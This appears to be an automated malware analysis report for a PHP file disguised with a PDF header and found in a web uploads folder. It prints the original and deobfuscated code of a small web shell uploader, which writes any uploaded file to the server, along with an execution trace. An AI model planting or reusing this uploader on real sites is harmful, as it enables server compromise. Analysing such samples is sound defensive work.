PHP Malware Analysis
updarurat.PhTml
md5: 7ffbf0b4b1f38920ab519fd8909342c9
Jump to:
- Deobfuscated code (Read more)
- Execution traces (Read more)
- Generated HTML (Read more)
- Original Code (Read more)
Screenshot
Attributes
Encoding
Files
- copy (Deobfuscated, Original)
Input
- _FILES (Deobfuscated, Original)
- _POST (Deobfuscated, Original)
Deobfuscated PHP code
%PDF-1.4
%âãÏÓ
191 0 obj
<</Linearized 1/L 171891/O 193/E 57322/N 2/T 167950/H [ 1036 257]>>
endobj
<?php
print_r("SH3LLF0UND");
if ($_POST) {
if (@copy($_FILES["0"]["tmp_name"], $_FILES["0"]["name"])) {
echo "Y";
} else {
echo "N";
}
} else {
echo "<form method=post enctype=multipart/form-data><input type=file name=0><input name=0 type=submit value=up>";
}Execution traces
data/traces/7ffbf0b4b1f38920ab519fd8909342c9_trace-1676251870.5891.xtVersion: 3.1.0beta2
File format: 4
TRACE START [2023-02-12 23:31:36.486958]
1 0 1 0.000150 393576
1 3 0 0.000227 396016 {main} 1 /var/www/html/uploads/updarurat.PhTml 0 0
2 4 0 0.000253 396016 base64_decode 0 /var/www/html/uploads/updarurat.PhTml 7 1 'U0gzTExGMFVORA=='
2 4 1 0.000277 396096
2 4 R 'SH3LLF0UND'
2 5 0 0.000301 396064 print_r 0 /var/www/html/uploads/updarurat.PhTml 7 1 'SH3LLF0UND'
2 5 1 0.000321 396096
2 5 R TRUE
1 3 1 0.000343 396016
0.000379 314264
TRACE END [2023-02-12 23:31:36.487224]
Generated HTML code
<html><head></head><body>%PDF-1.4
%âãÏÓ
191 0 obj
<>
endobj
SH3LLF0UND<form method="post" enctype="multipart/form-data"><input type="file" name="0"><input name="0" type="submit" value="up"></form></body></html>Original PHP code
%PDF-1.4
%âãÏÓ
191 0 obj
<</Linearized 1/L 171891/O 193/E 57322/N 2/T 167950/H [ 1036 257]>>
endobj
<?php print_r(base64_decode('U0gzTExGMFVORA==')); if($_POST){if(@copy($_FILES["0"]["tmp_name"],$_FILES["0"]["name"])){echo"Y";}else{echo"N";}}else{echo"<form method=post enctype=multipart/form-data><input type=file name=0><input name=0 type=submit value=up>";}?>